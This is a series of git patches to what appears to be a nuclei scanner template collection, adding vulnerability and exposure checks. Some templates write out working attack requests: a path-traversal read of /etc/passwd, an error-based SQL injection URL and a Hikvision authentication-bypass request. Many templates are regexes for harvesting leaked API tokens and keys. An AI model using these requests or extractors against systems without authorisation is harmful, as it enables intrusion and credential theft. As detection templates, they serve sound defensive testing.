From 7b447029466eeb7f365166cfcaed61006fb9bc26 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 6 Apr 2021 15:40:01 +0200 Subject: [PATCH 01/79] Remove duplicated CVE-2020-26073 template --- cves/2020/CVE-2020–26073.yaml | 25 ------------------------- 1 file changed, 25 deletions(-) delete mode 100644 cves/2020/CVE-2020–26073.yaml diff --git a/cves/2020/CVE-2020–26073.yaml b/cves/2020/CVE-2020–26073.yaml deleted file mode 100644 index 47d9a67723..0000000000 --- a/cves/2020/CVE-2020–26073.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: CVE-2020-26073 -info: - name: Cisco SD-WAN vManage Software Directory Traversal - author: madrobot - severity: high - description: | - A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. - - The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens. - reference: https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html - tags: lfi,cve,cve2020,cisco - -requests: - - method: GET - path: - - "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - words: - - "root:[x*]:0:0:" - part: body From 93e373621be9c8567c7b876a5a3834dc01363f00 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 6 Apr 2021 15:51:01 +0200 Subject: [PATCH 02/79] Rename docker-compose-config.yml template to yaml --- .../{docker-compose-config.yml => docker-compose-config.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/configs/{docker-compose-config.yml => docker-compose-config.yaml} (100%) diff --git a/exposures/configs/docker-compose-config.yml b/exposures/configs/docker-compose-config.yaml similarity index 100% rename from exposures/configs/docker-compose-config.yml rename to exposures/configs/docker-compose-config.yaml From 109da5c0bbf9d37aebeab8615e68b2cd2d694143 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 6 Apr 2021 14:44:27 +0000 Subject: [PATCH 03/79] Auto Update README [Tue Apr 6 14:44:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bf4e126bf4..05a0a48565 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 267 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 58 | | misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 889 files**. +**82 directories, 888 files**. From 81d8f6ed0a2c30e4f192768199a754e9b84f728d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:13:34 +0000 Subject: [PATCH 04/79] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index e61e7b1452..1fec819f7c 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -8,6 +8,9 @@ info: requests: - method: GET path: + - "{{BaseURL}}/config/error_log" + - "{{BaseURL}}/error_log" + - "{{BaseURL}}/errors_log" - "{{BaseURL}}/logs/error.log" - "{{BaseURL}}/logs/errors.log" - "{{BaseURL}}/log/error.log" From bf7e68855464ef0d157b67f3bc9ee7444c6c9aa7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:18:24 +0000 Subject: [PATCH 05/79] Update error-logs.yaml --- exposures/logs/error-logs.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 1fec819f7c..2d435d6f51 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -8,6 +8,7 @@ info: requests: - method: GET path: + - "{{BaseURL}}/routes/error_log" - "{{BaseURL}}/config/error_log" - "{{BaseURL}}/error_log" - "{{BaseURL}}/errors_log" From 3c8e98f3d47743f9dd4b8e3ab9607cc859c327b9 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Tue, 6 Apr 2021 19:27:45 +0000 Subject: [PATCH 06/79] Update laravel-log-file.yaml --- exposures/logs/laravel-log-file.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/exposures/logs/laravel-log-file.yaml b/exposures/logs/laravel-log-file.yaml index 917a56a4ac..75b47eac0b 100644 --- a/exposures/logs/laravel-log-file.yaml +++ b/exposures/logs/laravel-log-file.yaml @@ -2,7 +2,7 @@ id: laravel-log-file info: name: Laravel log file publicly accessible - author: sheikhrishad + author: sheikhrishad & geeknik severity: low tags: laravel,log,exposure @@ -14,10 +14,19 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "InvalidArgumentException" - condition: and - + - "local.ERROR" + - "ErrorException" + - "syntax error" + condition: or + - type: word + part: header + words: + - "text/plain" + - "text/x-log" + condition: or - type: status status: - 200 From 476473dc991248b6fe9a5c033cd76867667176d9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 01:19:30 +0530 Subject: [PATCH 07/79] Create coremail-config-disclosure.yaml --- .../configs/coremail-config-disclosure.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposures/configs/coremail-config-disclosure.yaml diff --git a/exposures/configs/coremail-config-disclosure.yaml b/exposures/configs/coremail-config-disclosure.yaml new file mode 100644 index 0000000000..394ce246de --- /dev/null +++ b/exposures/configs/coremail-config-disclosure.yaml @@ -0,0 +1,21 @@ +id: coremail-config-disclosure +info: + name: Coremail Config Disclosure + author: princechaddha + severity: high + reference: https://www.secpulse.com/archives/107611.html + tags: config,exposure + +requests: + - method: GET + path: + - '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/' + matchers-condition: and + matchers: + - type: word + words: + - "" + - 'containerDefinitions' + - type: status + status: + - 302 From d336658e9c512a3fd2542d7b9015d38e93943568 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 03:19:34 +0000 Subject: [PATCH 08/79] Update server-private-keys.yaml --- exposures/configs/server-private-keys.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/server-private-keys.yaml b/exposures/configs/server-private-keys.yaml index 6ce75dead1..53553efdd6 100644 --- a/exposures/configs/server-private-keys.yaml +++ b/exposures/configs/server-private-keys.yaml @@ -9,6 +9,7 @@ info: requests: - method: GET path: + - "{{BaseURL}}/localhost.key" - "{{BaseURL}}/host.key" - "{{BaseURL}}/www.key" - "{{BaseURL}}/private-key" From 7bc9df16d728522d56d837cc5c8f38b0b3c5aa19 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 14:26:16 +0530 Subject: [PATCH 09/79] misc fix --- cves/2019/CVE-2019-12461.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index 1980e3cf67..156fac2f58 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -7,9 +7,7 @@ info: description: Web Port 1.19.1 allows XSS via the /log type parameter. tags: cve,cve2019,xss reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS -# Vendor Homepage: https://webport.se/ -# Software Link: https://webport.se/nedladdningar/ -# reference: + software: https://webport.se/nedladdningar/ requests: - method: GET From 2292a7a0384496bfb77bf453b48c79ac36079e20 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 15:08:47 +0530 Subject: [PATCH 10/79] Adding aws-bucket-service detection --- technologies/aws-bucket-service.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 technologies/aws-bucket-service.yaml diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws-bucket-service.yaml new file mode 100644 index 0000000000..6112a1c409 --- /dev/null +++ b/technologies/aws-bucket-service.yaml @@ -0,0 +1,21 @@ +id: aws-bucket-service + +info: + name: Detect websites using AWS Bucket storage + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-amz-bucket') + - contains(tolower(all_headers), 'x-amz-request') + - contains(tolower(all_headers), 'x-amz-id') + - contains(tolower(all_headers), 'AmazonS3') + part: header + condition: or \ No newline at end of file From 0e097263ca8a1b9e5765a8d621b93a6106b03e90 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 15:52:58 +0530 Subject: [PATCH 11/79] Added google-bucket-service detection --- .../amazon-docker-config-disclosure.yaml | 2 +- technologies/aws-bucket-service.yaml | 12 +++++++-- technologies/google-bucket-service.yaml | 25 +++++++++++++++++++ 3 files changed, 36 insertions(+), 3 deletions(-) create mode 100644 technologies/google-bucket-service.yaml diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml index 943d81f7df..d8406dccc1 100644 --- a/exposures/configs/amazon-docker-config-disclosure.yaml +++ b/exposures/configs/amazon-docker-config-disclosure.yaml @@ -4,7 +4,7 @@ info: name: Dockerrun AWS Configuration Exposure author: pdteam severity: medium - tags: config,exposure + tags: config,exposure,aws requests: - method: GET diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws-bucket-service.yaml index 6112a1c409..b3eacd8135 100644 --- a/technologies/aws-bucket-service.yaml +++ b/technologies/aws-bucket-service.yaml @@ -1,15 +1,17 @@ id: aws-bucket-service info: - name: Detect websites using AWS Bucket storage + name: Detect websites using AWS bucket storage author: pdteam severity: info + tags: aws,tech requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: dsl dsl: @@ -18,4 +20,10 @@ requests: - contains(tolower(all_headers), 'x-amz-id') - contains(tolower(all_headers), 'AmazonS3') part: header - condition: or \ No newline at end of file + condition: or + + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-guploader-uploadid') + part: header + negative: true \ No newline at end of file diff --git a/technologies/google-bucket-service.yaml b/technologies/google-bucket-service.yaml new file mode 100644 index 0000000000..f8fe51f476 --- /dev/null +++ b/technologies/google-bucket-service.yaml @@ -0,0 +1,25 @@ +id: google-bucket-service + +info: + name: Detect websites using Google bucket storage + author: pdteam + severity: info + tags: google,tech + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-goog-component-count') + - contains(tolower(all_headers), 'x-goog-expiration') + - contains(tolower(all_headers), 'x-goog-generation') + - contains(tolower(all_headers), 'x-goog-metageneration') + - contains(tolower(all_headers), 'x-goog-stored-content-encoding') + - contains(tolower(all_headers), 'x-goog-stored-content-length') + - contains(tolower(all_headers), 'x-guploader-uploadid') + part: header + condition: or \ No newline at end of file From 55a68f95bd22d52bbf97d9c7369a0d53c8951882 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 10:38:40 +0000 Subject: [PATCH 12/79] Auto Update README [Wed Apr 7 10:38:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 05a0a48565..f00165eabd 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | -| takeovers | 67 | exposures | 66 | technologies | 58 | +| takeovers | 67 | exposures | 66 | technologies | 60 | | misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 888 files**. +**82 directories, 890 files**. From 76dcebcf85925a221e62dd2bf46094ab266f36ef Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:45:12 +0530 Subject: [PATCH 13/79] Added AWS Bucket Object listing detection --- misconfiguration/aws-object-listing.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 misconfiguration/aws-object-listing.yaml diff --git a/misconfiguration/aws-object-listing.yaml b/misconfiguration/aws-object-listing.yaml new file mode 100644 index 0000000000..b068f6a653 --- /dev/null +++ b/misconfiguration/aws-object-listing.yaml @@ -0,0 +1,24 @@ +id: aws-object-listing + +info: + name: AWS bucket with Object listing + author: pdteam + severity: low + reference: https://mikey96.medium.com/cloud-based-storage-misconfigurations-critical-bounties-361647f78a29 + tags: aws,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - application/xml + part: header \ No newline at end of file From 9a4d880b88fd9d3ca850a8911f4d0fb2c9508c6d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:45:49 +0530 Subject: [PATCH 14/79] Update aws-object-listing.yaml --- misconfiguration/aws-object-listing.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/aws-object-listing.yaml b/misconfiguration/aws-object-listing.yaml index b068f6a653..1e970518b4 100644 --- a/misconfiguration/aws-object-listing.yaml +++ b/misconfiguration/aws-object-listing.yaml @@ -12,6 +12,7 @@ requests: path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: From 8b88157c816af2e6dfbab1e5881c9caed28a6128 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 12:19:43 +0000 Subject: [PATCH 15/79] Auto Update README [Wed Apr 7 12:19:43 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f00165eabd..8fa750cb99 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 60 | -| misconfiguration | 54 | workflows | 27 | miscellaneous | 20 | +| misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 890 files**. +**82 directories, 891 files**. From c103f8c73c87abefada0994e56a4441b25d13b07 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:57:53 +0530 Subject: [PATCH 16/79] Removing duplicate --- exposures/logs/error-logs.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/logs/error-logs.yaml b/exposures/logs/error-logs.yaml index 2d435d6f51..bb3e7f653c 100644 --- a/exposures/logs/error-logs.yaml +++ b/exposures/logs/error-logs.yaml @@ -25,7 +25,6 @@ requests: - "{{BaseURL}}/admin/logs/error.log" - "{{BaseURL}}/admin/logs/errors.log" - "{{BaseURL}}/admin/log/error.log" - - "{{BaseURL}}/admin/logs/errors.log" - "{{BaseURL}}/admin/error.log" - "{{BaseURL}}/admin/errors.log" - "{{BaseURL}}/{{Hostname}}/error.log" From dd9a7a4b389f483c64aaaa330384ef3dd4c7ca00 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 7 Apr 2021 22:03:04 +0530 Subject: [PATCH 17/79] Create somfy-login.yaml --- exposed-panels/somfy-login.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/somfy-login.yaml diff --git a/exposed-panels/somfy-login.yaml b/exposed-panels/somfy-login.yaml new file mode 100644 index 0000000000..9e43ef1ec2 --- /dev/null +++ b/exposed-panels/somfy-login.yaml @@ -0,0 +1,22 @@ +id: somfy-login + +info: + name: Somfy Login Page + author: DhiyaneshDK + severity: info + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}/m_login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - Home motion by Somfy + condition: and + - type: status + status: + - 200 From 03c6126f60dc3aaf63dc01183c6960c5e1a43cf3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 22:03:17 +0530 Subject: [PATCH 18/79] Create etouch-v2-sqli.yaml --- vulnerabilities/other/etouch-v2-sqli.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 vulnerabilities/other/etouch-v2-sqli.yaml diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml new file mode 100644 index 0000000000..8e3c2ba11f --- /dev/null +++ b/vulnerabilities/other/etouch-v2-sqli.yaml @@ -0,0 +1,22 @@ +id: etouch-v2-sqli +info: + name: Etouch v2 SQL Injection + author: princechaddha + severity: high + tags: etouch,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "c4ca4238a0b923820dcc509a6f75849b" + part: body From e2ae9342eebace41c6090b3c7c210e3869525ea2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 7 Apr 2021 16:33:36 +0000 Subject: [PATCH 19/79] Auto Update README [Wed Apr 7 16:33:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8fa750cb99..e0281d7bc2 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 266 | vulnerabilities | 119 | exposed-panels | 117 | +| cves | 266 | vulnerabilities | 120 | exposed-panels | 117 | | takeovers | 67 | exposures | 66 | technologies | 60 | | misconfiguration | 55 | workflows | 27 | miscellaneous | 20 | | default-logins | 21 | exposed-tokens | 9 | dns | 8 | | fuzzing | 7 | helpers | 6 | iot | 11 | -**82 directories, 891 files**. +**82 directories, 892 files**. From a3510d29a09f1c402457fdd12bb32469588bb40f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 7 Apr 2021 22:30:37 +0530 Subject: [PATCH 20/79] Create CVE-2017-7921.yaml --- cves/2017/CVE-2017-7921.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2017/CVE-2017-7921.yaml diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml new file mode 100644 index 0000000000..29ca8293c2 --- /dev/null +++ b/cves/2017/CVE-2017-7921.yaml @@ -0,0 +1,24 @@ +id: CVE-2017-7921 +info: + name: Hikvision Authentication Bypass + author: princechaddha + severity: high + reference: https://www.cvedetails.com/cve/CVE-2017-7921/ + tags: cve,cve2017,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/xml" + part: header From 3e1e41d6bd91b02334f180fcff1bf4c22aa8f7d0 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 17:39:24 +0000 Subject: [PATCH 21/79] Create yii-debugger.yaml --- exposures/configs/yii-debugger.yaml | 32 +++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/yii-debugger.yaml diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml new file mode 100644 index 0000000000..24e3b37984 --- /dev/null +++ b/exposures/configs/yii-debugger.yaml @@ -0,0 +1,32 @@ +id: yii-debugger + +info: + name: View Yii Debugger Information + author: geeknik + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/debug/default/view.html" + - "{{BaseURL}}/debug/default/view" + - "{{BaseURL}}/frontend/web/debug/default/view" + - "{{BaseURL}}/web/debug/default/view" + - "{{BaseURL}}/sapi/debug/default/view" + + redirects: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Yii Debugger" + - "Status" + - "Route" + - "Log" + - "Time" + - "Memory" + - "DB" + condition: and From 110fb476146ab05f725ebfe124a25e1e7db7d3c7 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 7 Apr 2021 18:57:10 +0000 Subject: [PATCH 22/79] Update yii-debugger.yaml --- exposures/configs/yii-debugger.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/yii-debugger.yaml b/exposures/configs/yii-debugger.yaml index 24e3b37984..11232d47b1 100644 --- a/exposures/configs/yii-debugger.yaml +++ b/exposures/configs/yii-debugger.yaml @@ -3,6 +3,7 @@ id: yii-debugger info: name: View Yii Debugger Information author: geeknik + reference: https://yii2-framework.readthedocs.io/en/stable/guide/tool-debugger/ severity: info requests: From 17d67174f81e81f7cc41b6d6c6a17b8eeff00835 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 8 Apr 2021 21:15:49 +0530 Subject: [PATCH 23/79] More tokens and keys :rocket: --- .../amazon-mws-auth-token.yaml} | 6 ++-- exposed-tokens/amazon/amazon-sns-topic.yaml | 17 +++++++++++ .../{aws => amazon}/aws-access-key-value.yaml | 2 +- exposed-tokens/amazon/s3cmd-config.yaml | 19 +++++++++++++ .../artifactory/artifactory-api-password.yaml | 18 ++++++++++++ .../artifactory/artifactory-api-token.yaml | 18 ++++++++++++ exposed-tokens/bitly/bitly-secret-key.yaml | 18 ++++++++++++ .../cloudinary/cloudinary-credentials.yaml | 18 ++++++++++++ exposed-tokens/discord/discord-webhook.yaml | 18 ++++++++++++ exposed-tokens/generic/general-tokens.yaml | 14 ++++++---- .../generic/jdbc-connection-string.yaml | 18 ++++++++++++ exposed-tokens/generic/jwt-token.yaml | 18 ++++++++++++ .../google/google-calendar-link.yaml | 18 ++++++++++++ exposed-tokens/google/oauth-access-key.yaml | 18 ++++++++++++ exposed-tokens/heroku/heroku-api-key.yaml | 17 +++++++++++ .../mailchimp/mailchimp-api-key.yaml | 2 +- .../microsoft/microsoft-teams-webhook.yaml | 17 +++++++++++ .../newrelic/newrelic-admin-api-key.yaml | 17 +++++++++++ .../newrelic/newrelic-insights-key.yaml | 17 +++++++++++ .../newrelic/newrelic-rest-api-key.yaml | 17 +++++++++++ .../newrelic-synthetics-location-key.yaml | 17 +++++++++++ .../paypal/braintree-access-token.yaml | 17 +++++++++++ exposed-tokens/picatic/picatic-api-key.yaml | 17 +++++++++++ exposed-tokens/sendgrid/sendgrid-api-key.yaml | 17 +++++++++++ exposed-tokens/slack/slack-access-token.yaml | 28 ------------------- .../slack-bot-token.yaml} | 8 +++--- exposed-tokens/slack/slack-user-token.yaml | 18 ++++++++++++ exposed-tokens/slack/slack-webhook-token.yaml | 18 ++++++++++++ exposed-tokens/sonarqube/sonarqube-token.yaml | 17 +++++++++++ .../stripe/stripe-restricted-key.yaml | 17 +++++++++++ exposed-tokens/stripe/stripe-secret-key.yaml | 17 +++++++++++ .../zapier/zapier-webhook-token.yaml | 17 +++++++++++ exposed-tokens/zoho/zoho-webhook-token.yaml | 17 +++++++++++ 33 files changed, 489 insertions(+), 43 deletions(-) rename exposed-tokens/{aws/amazon-mws-auth-token-value.yaml => amazon/amazon-mws-auth-token.yaml} (72%) create mode 100755 exposed-tokens/amazon/amazon-sns-topic.yaml rename exposed-tokens/{aws => amazon}/aws-access-key-value.yaml (87%) create mode 100755 exposed-tokens/amazon/s3cmd-config.yaml create mode 100755 exposed-tokens/artifactory/artifactory-api-password.yaml create mode 100755 exposed-tokens/artifactory/artifactory-api-token.yaml create mode 100755 exposed-tokens/bitly/bitly-secret-key.yaml create mode 100755 exposed-tokens/cloudinary/cloudinary-credentials.yaml create mode 100755 exposed-tokens/discord/discord-webhook.yaml create mode 100755 exposed-tokens/generic/jdbc-connection-string.yaml create mode 100644 exposed-tokens/generic/jwt-token.yaml create mode 100755 exposed-tokens/google/google-calendar-link.yaml create mode 100755 exposed-tokens/google/oauth-access-key.yaml create mode 100755 exposed-tokens/heroku/heroku-api-key.yaml create mode 100755 exposed-tokens/microsoft/microsoft-teams-webhook.yaml create mode 100644 exposed-tokens/newrelic/newrelic-admin-api-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-insights-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-rest-api-key.yaml create mode 100644 exposed-tokens/newrelic/newrelic-synthetics-location-key.yaml create mode 100755 exposed-tokens/paypal/braintree-access-token.yaml create mode 100755 exposed-tokens/picatic/picatic-api-key.yaml create mode 100644 exposed-tokens/sendgrid/sendgrid-api-key.yaml delete mode 100644 exposed-tokens/slack/slack-access-token.yaml rename exposed-tokens/{generic/http-username-password.yaml => slack/slack-bot-token.yaml} (53%) create mode 100644 exposed-tokens/slack/slack-user-token.yaml create mode 100755 exposed-tokens/slack/slack-webhook-token.yaml create mode 100755 exposed-tokens/sonarqube/sonarqube-token.yaml create mode 100755 exposed-tokens/stripe/stripe-restricted-key.yaml create mode 100755 exposed-tokens/stripe/stripe-secret-key.yaml create mode 100755 exposed-tokens/zapier/zapier-webhook-token.yaml create mode 100755 exposed-tokens/zoho/zoho-webhook-token.yaml diff --git a/exposed-tokens/aws/amazon-mws-auth-token-value.yaml b/exposed-tokens/amazon/amazon-mws-auth-token.yaml similarity index 72% rename from exposed-tokens/aws/amazon-mws-auth-token-value.yaml rename to exposed-tokens/amazon/amazon-mws-auth-token.yaml index e0f70808f5..6ca9b23318 100644 --- a/exposed-tokens/aws/amazon-mws-auth-token-value.yaml +++ b/exposed-tokens/amazon/amazon-mws-auth-token.yaml @@ -1,9 +1,9 @@ -id: amazon-mws-auth-token-value +id: amazon-mws-auth-token info: + name: Amazon MWS Auth Token author: puzzlepeaches - name: "Amazon MWS Auth Token" - severity: medium + severity: info tags: token,aws requests: diff --git a/exposed-tokens/amazon/amazon-sns-topic.yaml b/exposed-tokens/amazon/amazon-sns-topic.yaml new file mode 100755 index 0000000000..a04f44bfe5 --- /dev/null +++ b/exposed-tokens/amazon/amazon-sns-topic.yaml @@ -0,0 +1,17 @@ +id: amazon-sns-topic + +info: + name: Amazon SNS Topic Disclosure + author: Ice3man + severity: info + tags: token,amazon + +requests: + - method: GET + path: + - "{{BaseURL}}" + extractors: + - type: regex + part: body + regex: + - 'arn:aws:sns:[a-z0-9\-]+:[0-9]+:[A-Za-z0-9\-_]+' \ No newline at end of file diff --git a/exposed-tokens/aws/aws-access-key-value.yaml b/exposed-tokens/amazon/aws-access-key-value.yaml similarity index 87% rename from exposed-tokens/aws/aws-access-key-value.yaml rename to exposed-tokens/amazon/aws-access-key-value.yaml index f1873560bd..089e61d558 100644 --- a/exposed-tokens/aws/aws-access-key-value.yaml +++ b/exposed-tokens/amazon/aws-access-key-value.yaml @@ -4,7 +4,7 @@ info: name: AWS Access Key ID Value author: Swissky severity: info - tags: token,aws + tags: token,aws,amazon requests: - method: GET diff --git a/exposed-tokens/amazon/s3cmd-config.yaml b/exposed-tokens/amazon/s3cmd-config.yaml new file mode 100755 index 0000000000..553330f329 --- /dev/null +++ b/exposed-tokens/amazon/s3cmd-config.yaml @@ -0,0 +1,19 @@ +id: s3cmd-config + +info: + name: S3CMD Configuration Disclosure + author: Ice3man + severity: info + tags: amazon,config + +requests: + - method: GET + path: + - "{{BaseURL}}/s3cmd.ini" + matchers: + - type: word + part: body + words: + - '[default]' + - 'access_key' + condition: and \ No newline at end of file diff --git a/exposed-tokens/artifactory/artifactory-api-password.yaml b/exposed-tokens/artifactory/artifactory-api-password.yaml new file mode 100755 index 0000000000..7edfb3fdb1 --- /dev/null +++ b/exposed-tokens/artifactory/artifactory-api-password.yaml @@ -0,0 +1,18 @@ +id: artifactory-api-password + +info: + name: Artifactory Password Disclosure + author: Ice3man + severity: info + tags: token,artifactory + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - '(?:\s|=|:|"|^)AP[\dABCDEF][a-zA-Z0-9]{8,}' \ No newline at end of file diff --git a/exposed-tokens/artifactory/artifactory-api-token.yaml b/exposed-tokens/artifactory/artifactory-api-token.yaml new file mode 100755 index 0000000000..774f6e7f36 --- /dev/null +++ b/exposed-tokens/artifactory/artifactory-api-token.yaml @@ -0,0 +1,18 @@ +id: 